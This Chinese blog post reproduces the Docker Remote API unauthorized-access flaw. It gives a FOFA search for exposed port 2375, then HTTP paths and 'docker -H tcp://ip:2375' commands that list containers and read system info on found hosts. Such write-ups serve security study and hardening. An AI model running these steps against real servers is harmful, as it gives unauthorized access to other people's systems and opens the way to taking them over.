当前位置: 首页 > article >正文

Docker Remote API未授权访问漏洞复现

一、漏洞信息

Docker Remote API如配置不当可导致未授权访问,被攻击者恶意利⽤。攻击者⽆需认证即可访问到Docker数据,可能导致敏感信息泄露,⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感 信息,或对敏感⽂件进⾏修改,最终完全控制服务器。

二、漏洞复现

1.使用以下fofa语句对docker产品进行搜索:

port="2375"

2.在搜索的结果网站后访问以下路径

http://ip:2375/version        #查看版本信息
http://ip:2375/info        #查看容器信息

3.可以使用-H参数连接目标主机的docker

docker -H tcp://ip:2375 ps        #查看目标主机运行的镜像
docker -H tcp://ip:2375 version        #查看目标主机的版本信息
docker -H tcp://ip:2375 info        #查看目标主机的容器信息


http://www.kler.cn/a/548525.html

相关文章:

  • 国产编辑器EverEdit - 二进制模式下观察Window/Linux/MacOs换行符差异
  • 两个实用且热门的 Python 爬虫案例,结合动态/静态网页抓取和反爬策略,附带详细代码和实现说明
  • Rust 语言入门(一):打印与格式化输出
  • 尚航科技助力DeepSeek正式登陆无锡
  • windows系统远程桌面连接ubuntu18.04
  • 20 FastAPI 性能优化
  • 如何检索和下载空间单细胞蛋白组的原始数据
  • Elasticsearch:15 年来致力于索引一切,找到重要内容
  • Java NIO ByteBuffer 详解
  • 神经网络的学习 求梯度
  • 【鸿蒙】从网页打开获取文件,并转成base64
  • 【微服务学习一】springboot微服务项目构建以及nacos服务注册
  • Python爬虫技术
  • 【推理llm论文精度】DeepSeek-R1:强化学习驱动LLM推理能力飞跃
  • 如何在Spring Boot中配置分布式配置中心
  • 消息队列概要讲解
  • uniapp-列表样式
  • 安卓基础(Adapter)
  • Redisson分布式锁和同步器完整篇
  • BeginInvoke和Invoke的使用时机